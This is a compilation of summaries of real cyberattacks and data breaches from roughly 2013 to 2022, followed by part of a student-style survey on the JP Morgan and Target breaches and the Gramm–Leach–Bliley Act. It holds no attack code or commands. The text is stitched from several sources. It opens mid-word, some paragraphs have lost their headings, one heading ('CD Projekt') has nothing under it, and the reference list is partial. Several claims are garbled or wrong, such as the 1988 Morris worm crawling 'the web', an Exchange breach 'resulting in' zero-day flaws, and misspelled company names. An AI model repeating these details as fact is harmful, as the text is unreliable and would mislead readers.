Professional Documents
Culture Documents
Cyberattacks All Over The World
Cyberattacks All Over The World
der normal business circumstances, cyber attacks are an ever-increasing problem causing
trillions of dollars in losses. To make matters worse, the war between Russia and Ukraine
exacerbated these problems with a flurry of major politically-motivated cyber attacks in
2022. Here are some of the recent cyber attacks.
The Russian “hacktivist” group called the People’s Cyber Army engaged 7.25 million bots in
August 2022 in a bot attack to take the Energoatom website down. It used a flood of garbage
web traffic and webpage requests. A disruption of online services lasted for a few hours, but
no permanent negative impact remained. The attack was part of a Russian psyops campaign
to create fear of a nuclear disaster and terrorize Europeans.
Additionally, there was data destruction on 44 servers and hundreds of computers. The ICCO
also lost 35 databases with highly-confidential information about money laundering, spies,
and terrorists living abroad.
In July 2022, the Belgian government announced that three Chinese hacker groups, part of
the known Chinese Advanced Persistent Threat actors, attacked Belgian public services and
military defense forces. The Chinese government-sponsored attackers steal trade secrets and
intelligence information. The Soft Cell Chinese group recently launched a new remote access
trojan (RAT) malware in June 2022.
Hackers took over the Twitter account of the British Army in July 2022. The social media
account underwent multiple name and photo changes. The content started promoting contests
to win Angry Apes non-fungible tokens (NFTs), digital art stored on a blockchain. The
army’s YouTube page experienced an attack as well. Its name changed to Ark Invest, and the
account promoted interviews of Elon Musk talking about cryptocurrency.
A DDoS attack in July 2022 blocked access to the website of the Lithuanian energy
company, Ignitis Group. The company managed the attack and limited the damage
using DDoS Protection. No data breach occurred, but the attacks were persistent and ongoing.
Pro-Russia group Killnet claimed responsibility. The attack retaliated against Lithuanian
support of Ukraine in the war with Russia.
One of the most damaging recent cyberattacks was a Microsoft Exchange server compromise
that resulted in several zero-day vulnerabilities. The vulnerabilities, known as ProxyLogon
and initially launched by the Hafnium hacking group, were first spotted by Microsoft in
January and patched in March. However, more groups joined Hafnium in attacking unpatched
systems, resulting in thousands of organizations being compromised.
Tether Attack
In March 2021, cyber criminals threatened to leak documents from the Tether
cryptocurrency. The attackers claimed the data would “harm the Bitcoin ecosystem” and
demanded a settlement fee of around 500 Bitcoin ($24 million), but Tether refused to pay.
A ransomware attack on insurance firm CNA Financial left employees locked out of their
systems and blocked from accessing corporate resources. The attack in March 2021 also
involved company data being stolen, which led CNA Financial to reportedly pay the $40
million settlement fee.
Facebook Cyberattack
Data of more than 530 million Facebook users, including their names, Facebook IDs, dates of
birth, and relationship status, was published online in April 2021. Facebook, now Meta, said
the information was obtained through scraping in 2019.
The growing threat that advanced cybersecurity attacks pose to the world was highlighted by
the Colonial Pipeline attack in May 2021. The fuel pipeline operator suffered a ransomware
attack launched by the DarkSide hacking group, which led to fuel disruption and mass panic
buying across the U.S.
Omiai Cyberattack
An unauthorized entry cyberattack in May 2021 resulted in the exposure of 1.7 million users
of the Japanese dating app Omiai.
In June 2021, Audi and Volkswagen revealed a data breach had affected more than 3.3
million customers and prospective buyers, who were primarily U.S.-based. The breach was
blamed on an associated vendor, which was purportedly responsible for exposing the data
between August 2019 and May 2021.
Guntrader.uk Cyberattack
The United Kingdom’s trading website for guns and shooting equipment revealed that
records of 100,000 gun owners had been stolen and published online in July 2021. Gun
ownership is strictly controlled in the U.K., so the data breach of customers’ names and
addresses caused significant privacy and safety concerns.
T-Mobile Attack
In August 2021, telecoms firm T-Mobile suffered a cybersecurity breach that led to the data
of around 50 million existing customers and prospects being stolen. The data, which included
customer addresses, drivers' licenses, and social security numbers, was stolen by a 21-year-
old, who claimed to have obtained around 106GB of information.
AP-HP Attack
Cybersecurity attacks on medical organizations and healthcare firms are also increasing. As a
result of the hack on AP-HP, a Paris public hospital system, in September 2021, cyber
criminals stole personal data belonging to around 1.4 million people who were tested for
COVID-19 in 2020.
Cream Finance, a decentralized finance firm, suffered a vulnerability in its project’s market
system. The hack, which was revealed in September 2021, caused losses worth $34 million.
A South African debt recovery company suffered a significant attack that led to client and
employee data being illegally accessed from its servers in September 2021. The incident is
suspected to have affected the personally identifiable information (PII), including owed
debts, of over 1.4 million people.
Department store Neiman Marcus suffered a data breach that resulted in the exposure and
theft of up to 3.1 million customers’ payment card details. The attack was detected in
September 2021 but began in May 2020, and most of the data stolen was believed to have
been from expired or invalid cards.
A hacker, who claimed to have leaked the entire database of Argentina’s National Registry of
Persons, has allegedly stolen the data of more than 45 million Argentinian residents.
However, the government denied the hack.
Also in November 2021, a data breach of the trading app Robinhood affected the data of
around 5 million users. Data like usernames, email addresses, and phone numbers were
compromised through a customer support system.
BitMart cyberattack
Yet another cybersecurity attack against digital currencies, BitMart suffered a breach that
enabled cyber criminals to steal approximately $150 million worth of cryptocurrency in
December 2021. The attack resulted in total losses of around $200 million, including
damages.
Log4j Breach
In December 2021, a zero-day vulnerability was discovered in the Log4j Java library. The
remote code execution flaw is now active, and the resulting bug, Log4Shell, is being
activated by botnets like Mirai.
Kronos Cyberattack
HR platform Kronos suffered a ransomware attack that took the Kronos Private Cloud
offline. The outage occurred shortly before Christmas and took the vital service down for
several weeks.
In August 2020, credit reporting agency Experian suffered a breach that affected 24 million
consumers in South Africa and more than 793,000 businesses. The incident occurred when an
individual who claimed to be a client requested services that prompted the data’s release. The
stolen data was eventually secured and deleted, while Experian revealed it had not been used
fraudulently and that its customer database, infrastructure, and systems had not been
compromised.
The data of more than 10.6 million customers of MGM Resorts hotels was leaked to a
hacking forum in February 2020. The data included addresses, dates of birth, email addresses,
names, and phone numbers belonging to celebrities, business executives, government
employees, and tourists.
However, the hack did not breach users’ credit card details. The incident began in mid-2019
when MGM discovered unauthorized access to its server. Another data breach followed in
February 2020, which saw user data published on an open, accessible forum.
California University Cyber Attack
The University of California, based in San Francisco, suffered a ransomware attack that led to
hackers demanding a settlement payment of $3 million on June 1, 2020. The university’s
system was targeted by malware that could encrypt various servers and steal and encrypt
critical data. The university negotiated and paid a settlement fee of $1.14 million but later
revealed no data had been compromised.
Technology and consulting firm Cognizant was affected by the Maze ransomware attack on
April 18, 2020. The attackers stole data and threatened to publish it online unless Cognizant
paid a settlement fee. Cognizant later revealed it paid a ransom fee of between $50 million
and $70 million to restore its services.
Tillamook County’s IT systems were infected by encryption malware on January 22, 2020.
The attack shut down its computer and phone systems and took down the website that hosts
its various departments. Tillamook County’s computer systems were down for at least two
weeks, and attackers demanded $300,000 as settlement, which would double after two weeks,
to restore the data. The county tried to avoid paying the settlement fee but could not restore
the data and eventually settled.
WHO Attack
As the COVID-19 pandemic broke, an attack targeting the World Health Organization
(WHO) resulted in the breach of 25,000 email addresses and passwords. The data was leaked
online on April 19, 2020, along with information belonging to other groups fighting the
pandemic, including the Gates Foundation, the National Institutes of Health (NIH), and the
U.S. Centers for Disease Control and Prevention (CDC).
Videoconferencing service Zoom saw a massive increase in activity throughout 2020 with
people working from home and speaking to friends and family through the application.
However, in April 2020, a cyberattack known as Zoombombing enabled cyber criminals to
join private meetings, access conversations, and share offensive images, videos, and screens.
Zoom updated its application to enhance security levels.
A Mitsubishi Electric systems data breach resulted in around 200 MB of files being stolen.
The breach, which was first detected in June 2019 but was reported in January 2020,
contained employee and applicant information, data about retired employees from affiliate
companies, and sales and technical material. The attack was caused by a vulnerability in the
organization’s antivirus solution, which Chinese hackers exploited.
Know the key threat trends, cyber techniques, and cyber security practices and habits to
adopt.
The first cyber-attack on record was The Morris Worm in 1988. Robert Tappan Morris, a
graduate student at Cornell University, developed a worm program that would crawl the web
to count how many computers were connected to the internet. However, the worm installed
itself on one in seven computers and forced them to crash, which saw it inadvertently become
the first distributed denial-of-service (DDoS) attack. The Morris Worm damaged around
6,000 computers, which then comprised 10% of the entire internet.
In 2002, the first internet attack as we now know it saw a DDoS attack target the 13 Domain
Name System (DNS) root servers. The attack could have brought the internet down if
allowed to continue and was then the most sophisticated and widescale cyber-attack ever
launched.
Recent cyber-attacks have advanced and can affect vast numbers of people. Single attacks
now regularly steal the data of hundreds of millions of people.
The Russia-Ukraine crisis, which began in February 2022, involved not just physical battles
that displaced thousands and killed many—but cyberattacks as well. FortiGuard Labs has
determined that new viper malware was used to attack Ukrainian targets and discovered it
installed on at least several hundred machines in Ukraine. Several Ukrainian organizations
have also been targeted by sophisticated attacks that used the KillDisk and HermeticWiper
malware strands, which appear to destroy data on devices.
In addition, a tool that remotely controls devices, Remote Manipulator System (RMS), was
found to have been distributed in Ukraine via fake “Evacuation Plan” emails. Ukraine also
suffered a wave of distributed denial-of-service (DDoS) attacks. This included an attack
targeting the State Savings Bank, which impacted banking services and cash withdrawals
from ATMs, as well as disrupted the Ministry of Defence and Armed Forces networks.
In October 2013, software company Adobe suffered a cyber-attack in which hackers stole
credit card data from nearly 3 million customers. The attack also saw login credential data,
including usernames and hashed passwords, of up to 150 million users stolen. Further
research into the attack discovered that the hackers had also stolen customer names,
identification data, passwords, and more debit and credit card data.
In May 2019, the graphic design website Canva suffered an attack that exposed email
addresses, names, cities of residence, passwords, and usernames of 137 million users.
Hackers were also able to view but not steal files that included partial payment and credit
card data.
The attackers, known as GnosticPlayers, contacted the technology news website ZDNet to
boast about the attack. They claimed to have obtained users’ open authorization (OAuth)
login tokens, which are used for logging in via Google.
Canva confirmed the attack, notified its users, and prompted them to update their passwords
and reset their OAuth tokens. But a list of 4 million Canva accounts and stolen passwords
was later shared online, which resulted in Canva having to invalidate any passwords that
remained unchanged.
Dubsmash Attack
More than 162 million users’ data—email addresses, hashed passwords, dates of birth, and
usernames—was stolen from the video messaging service Dubsmash in December 2018. A
year later, the data was made available for sale on dark web site Dream Market as part of a
dump of data that also included information from attacks on Armor Games, Coffee Meets
Bagel, MyHeritage, MyFitnessPal, and ShareThis.
Dubsmash acknowledged that its systems had been breached and the stolen data put up for
sale, and advised users to change their passwords. However, it has not reported how attackers
gained access to the data or confirmed the attack scale.
eBay Data Breach
A cyber attack in May 2014 exposed the account list of eBay’s 145 million users. The attack,
which exposed user addresses, dates of birth, names, and encrypted passwords, occurred as
hackers obtained three eBay employees’ credentials. Attackers gained complete access to the
entire eBay network for 229 days.
eBay asked customers to update their passwords, for which it received criticism over its poor
communication and password-renewal process implementation. The auction site also advised
that financial details, such as credit card information, were stored in a separate location and
had not been compromised.
The business social network LinkedIn is a common target for cyber criminals
launching social engineering attacks. It has also suffered major cyber attacks that leaked its
users’ data.
The first came in 2012, when 6.5 million hashed passwords were stolen then posted on a
Russian hacker forum. The attack’s true size was revealed four years later when a hacker was
discovered selling 165 million LinkedIn users’ email addresses and passwords for 5 bitcoins,
which were then worth around $2,000. LinkedIn acknowledged the breach and reset
passwords on all accounts that had been affected.
Slack Attack
Collaboration platform Slack was affected in 2015 when hackers gained unauthorized access
to the service’s infrastructure. This included a database storing user profile data, such as
usernames and hashed passwords. The attackers also injected code that enabled them to steal
plaintext passwords when users entered them.
Slack revealed the attack affected around 1% of its users, estimated to be around 65,000
users. It immediately reset their passwords and advised all users to reset their passwords and
implement security measures like two-factor authentication (2FA).
Four years later, a Slack bug bounty program revealed a potential compromise of Slack
credentials, which it suspected was due to malware or users recycling passwords across
online services. It subsequently realized that most of the credentials affected were from
accounts that accessed the service during the 2015 incident.
Cyber attacks targeting the internet provider Yahoo are widely acknowledged as the most
significant data breaches in history. The state-sponsored attacks, which began in 2013,
affected all of Yahoo’s 3 billion users.
In September 2016, Yahoo revealed a 2014 attack that compromised 500 million users’
names, email addresses, telephone numbers, and birth dates. Three months later, the company
revealed a breach from 2013, which was carried out by another attacker and compromised its
users' names, email addresses, passwords, dates of birth, and security questions and answers.
Yahoo initially estimated that the 2013 attack affected 1 billion users but later changed that to
its entire user base of 3 billion people.
Zynga Attack
Games developer Zynga, which created various popular games that users accessed via
Facebook, suffered a massive cyber attack in September 2019. The attack by Pakistani hacker
group GnosticPlayers, who also claimed the Canva attack, accessed the database of Zynga
games Draw Something and Words With Friends. It compromised the email addresses,
hashed passwords, phone numbers, and Facebook and Zynga user IDs of 218 million people.
Of all of the cyber and ransomware attacks in 2021, the breach of Colonial Pipeline in late
April had the most news coverage. As Touro College Illinois Cybersecurity Program Director
Joe Giordano notes, “The Colonial Pipeline attack made such an impact because the pipeline
is an important part of the national critical infrastructure system. Taking the system down
disrupted gas supplies all along the East Coast of the United States, causing chaos and panic.”
As most Americans are directly impacted by gasoline shortages, this attack hit close to home
for many consumers. The DarkSide gang was behind the attack and targeted the firm’s billing
system and internal business network, leading to widespread shortages in multiple states. To
avoid further disruption, Colonial Pipeline eventually gave in to the demands and paid the
group $4.4 million dollars in bitcoin.
This attack was particularly dangerous because consumers started to panic and ignored safety
precautions. Some East Coast residents tried to hoard gasoline in flammable plastic bags and
bins, and one car even caught on fire. After the chaos receded, government officials
confirmed that Colonial Pipeline’s cybersecurity measures were not up to par and may have
been prevented if stronger protection was in place.
Thankfully, US law enforcement was able to recover much of the $4.4 million ransom
payment. The FBI was able to trace the money by monitoring cryptocurrency movement and
digital wallets. But finding the actual hackers behind the attack will prove a lot harder. (The
New York Times(opens in a new tab))
Brenntag
At around the same time in early May 2021, the same notorious hacker group that targeted
Colonial Pipeline, DarkSide, also targeted Brenntag, a chemical distribution company. After
stealing 150 GB worth of data, DarkSide demanded the equivalent of $7.5 million dollars in
bitcoin.
Brenntag soon caved to the demands and ended up paying $4.4 million. Although it was a
little more than half of the original demand, it still stands as one of the highest ransomware
payments in history. (IT Governance(opens in a new tab))
Acer
Also in May this year, the computer manufacturer Acer(opens in a new tab) was attacked by
the REvil hacker group, the same group responsible for an attack on London foreign
exchange firm Travelex. The $50 million ransom stood out as the largest known to date.
REvil hackers exploited a vulnerability in a Microsoft Exchange server to get access to
Acer’s files and leaked images of sensitive financial documents and spreadsheets.
JBS Foods
Although Spring 2021 held hopeful news for the end of the pandemic, the increased trend of
cyber attacks that began in 2020 showed no signs of slowing down. Another high-profile
ransomware attack took place this May on JBS Foods, one of the biggest meat processing
companies in the world. The same Russia-based hacking group that attacked Acer, REvil, is
thought to be behind the attack. (CNN(opens in a new tab))
Although there weren't any major food shortages as a result of the attack, government
officials told consumers not to panic buy meat in response. On June 10th, it was confirmed
that JSB paid the $11 million ransom demand after consulting with cybersecurity experts.
This massive payment in bitcoin is one of the largest ransomware payments of all time. (CBS
News(opens in a new tab))
Quanta
As with the Acer attack, the REvil gang also demanded a $50 million ransom from computer
manufacturer Quanta in April. Although Quanta may not be a household name, the company
is one of Apple’s major business partners. After the firm refused negotiations with the hacker
group, REvil targeted Apple instead. After leaking Apple product blueprints obtained from
Quanta, they threatened to release more sensitive documents and data. By May, REvil
seemed to have called off the attack.
Businesses and organizations from all different kinds of industries are targeted by
ransomware attacks. One of the more surprising on the list this year was the National
Basketball Association (NBA). In mid-April of this year, the hacker group Babuk claimed to
have stolen 500 GB of confidential data concerning the Houston Rockets. Babuk warned that
these confidential documents, including financial info and contracts, would be made public if
their demands were not met. As of this posting, no ransom payments have been made.
AXA
This May, the European insurance company AXA was attacked by the Avaddon gang. The
attack happened soon after the company announced important changes to their insurance
policy. Essentially, AXA stated they would stop reimbursing many of their clients for
ransomware payments. This unique (and somewhat ironic) attack on a cyber-insurance firm
made headlines and the hacker group gained access to a massive 3 TB of
data. (BlackFog(opens in a new tab))
CNA
Earlier this year in March, another large insurance firm fell victim to a ransomware attack.
CNA’s network was attacked on March 21(opens in a new tab) and the hacker group
encrypted 15,000 devices, including many computers of employees working remotely. The
attack is supposedly linked to the hacker group Evil Corp and uses a new type of malware
called Phoenix CryptoLocker.
CD Projekt
Kaseya
REvil, the same hacker group that targeted Acer, Quanta, and JBS Foods, again made
headlines in July with an attack on Kaseya. While not a name commonly known by
consumers, Kaseya manages IT infrastructure for major companies worldwide. Similar to the
attacks on Colonial Pipeline and JBS Foods, this hack had the potential to disrupt key areas
of the economy on a large scale.
To carry out the attack, REvil sent out a fake software update through Kaseya’s Virtual
System Administrator, which infiltrated both Kaseya’s direct clients as well as their
customers. According to REvil, one million systems were encrypted and held for ransom.
According to Kayesa, around 50 of their clients and around 1000 businesses in total were
impacted. The hacker group demanded $70 million in bitcoin. To illustrate the impact of the
cyber attack, Coop, a Swedish supermarket chain, was forced to close 800 stores for a full
week. (ZDNet(opens in a new tab))
Soon after the attack, the FBI gained access to REvil’s servers and obtained the encryption
keys to resolve the hack. Fortunately, no ransom was paid and Kaseya was able to restore the
IT infrastructure of its clients. Although it started out as one of the biggest ransomware
attacks of the year, the situation was salvaged in the end. (ZDNet(opens in a new tab))
Although not a state-sponsored organization, the group behind the Kaseya attack is based in
Russia. According to the Associated Press(opens in a new tab), the widespread security event
prompted a call between President Biden and President Putin in July. During the call, Biden
pressured Putin to take a stronger stance on targeting malicious agents in his country.
Although exactly what took place after this phone call is unclear, the FBI gained access to
REvil’s servers, and REvil’s website and infrastructure went down soon after. While it’s
uncertain whether Biden’s call made a difference, the White House asserts that it will keep up
the pressure on Russia to cooperate.
Despite the continued onslaught of ransomware attacks, there have been some hopeful
developments. In November, news broke that five suspected associates of the REvil group
were arrested by the European law enforcement agency Europol. According to
Fortune.com(opens in a new tab), “the alleged hackers are suspected of involvement in about
5,000 ransomware infections and received about half a million Euros ($579,000) in ransom
payments.”
Using wiretapping and other methods, police were able to access group infrastructure and
track down the alleged hackers. The two most recent arrests were the result of collaboration
between 17 countries, including major world powers like the U.S., U.K. and France.
Throughout the last decade widespread use of Computer in all sector of lives have
made them target for attackers to steal, infiltrate and disrupt. Lot of this attack has
been going under the radar for some time before the culprit being prosecuted under
the law. Any kind of attacks that compromises any of the characteristics of CIA
(Confidentiality, Integrity and availability) is considered as Cyberattacks. Due to the
global internetwork of computer system the attackers no longer confined to any fixed
geographical location. Hence they can pick up any target from any corner of the
world.
The motivation behind these cyber-attacks also ranges from money, data theft,
Cyber Espionage, political etc. If we look at the following figure we will see the
motivation of these cyber-attacks visually.
Fig: 1: Motivation behind the Cyberattacks [1]
The survey paper following below will try to summarize recent attacks that has been
taken places over the last few years and also have look at the Significant Cyber
Laws.
Cyber Attacks
Attacks on JP Morgan:
In 2014 massive attacks were reported as JP Morgan found out they have been on
attack for some months. When they found out in august that their accounts has been
accessed by the hacker for since last two to three months which went unnoticed.
JP Morgan reported for over 80 million customer’s information being compromised.
[6]
The attack was performed by some crafty spearfishing techniques used by the
attacker for the JP Morgan’s customers. They gained privileged access to the
system by which they were able to copy customer information without being
detected. Though the attacker did managed to get into the JP Morgan’s network but
they could not get into the banking section of the customer for which the customer
didn’t lose any money.
Spearfishing attacks lure victims to download or open up attachment from rather
harmless looking email. In this type of attack the attacker usually use crafty email to
persuade its victim to download malware into their system which they can remotely
control to initiate further attacks on the victim.
Real time traffic analysis, Inbox Email Sandboxing and above all User’s safe
Behavior in regards to Email handling can go long way in curbing the spear-fishing
attack.
Attacks on Target:
In 2013 the Target was under attack by the hacker which managed to steal like over
40 million of credit card information’s and resulting in setting back the Target for over
150 million of dollars loss through compensation and other legal complications.
The attack was done via the Target’s POS system being attacked by crafty malware
which extracted the credit card information at first then after some days started
sending over the copied information within the target’s network and ultimately to FTP
server controlled by the hacker. The malware scrapped for data as the customer
swipe in their credit/debit card on the POS terminal. [8]
Cyber Laws:
The Gramm–Leach–Bliley Act (1998): One of the most well-known laws also
referred as GLBA is well known act in financial area. Basically it regulated how
financial organizations can store, share and use the customer’s information between
different organizations by making three conditions mandatory as follows:
Securing personal financial information
Getting consent of the customers for sharing their personal information with
others
Giving the customer opportunities for opting out of the sharing of their
Information.[9]
As we can see from above there is been myriad of attacks frequently happening and
lot of them are far from. According to the survey presented by the Ponemon Institute
in 2013 the cyberattack incidents costs USA for about 11.6 million dollars which was
up by 26 percent from the previous year. [11] Most of the attacks discussed earlier
could have been prevented had there been better secured system in place. Also if
users were properly trained not to fall for the spearfishing mail some of the attacks
could have been avoided. Having said that as more and more computer gets online
more the cyberattacks will arise. Nevertheless having up-to-date system with
patches and proper locking down with auditing logging can thwart the effort of the
hacker to a certain extent.
References:
4. The Huffington Post, (2015). Citigroup: $2.7 Million Stolen From Customers
As Result Of Hacking. Retrieved 1 September 2015, from
http://www.huffingtonpost.com/2011/06/27/citigroup-hack_n_885045.html
5. Owasp.org, (2015). Session hijacking attack - OWASP. Retrieved 5
September 2015, from
https://www.owasp.org/index.php/Session_hijacking_attack
7. LESS THAN ZERO: A Survey of Zero-day Attacks in 2013 and What They
Say about the Traditional Security Model. (2015). Retrieved 3 September
2015, from https://www.fireeye.com/resources/pdfs/white-papers/fireeye-zero-
day-attacks-in-2013.pdf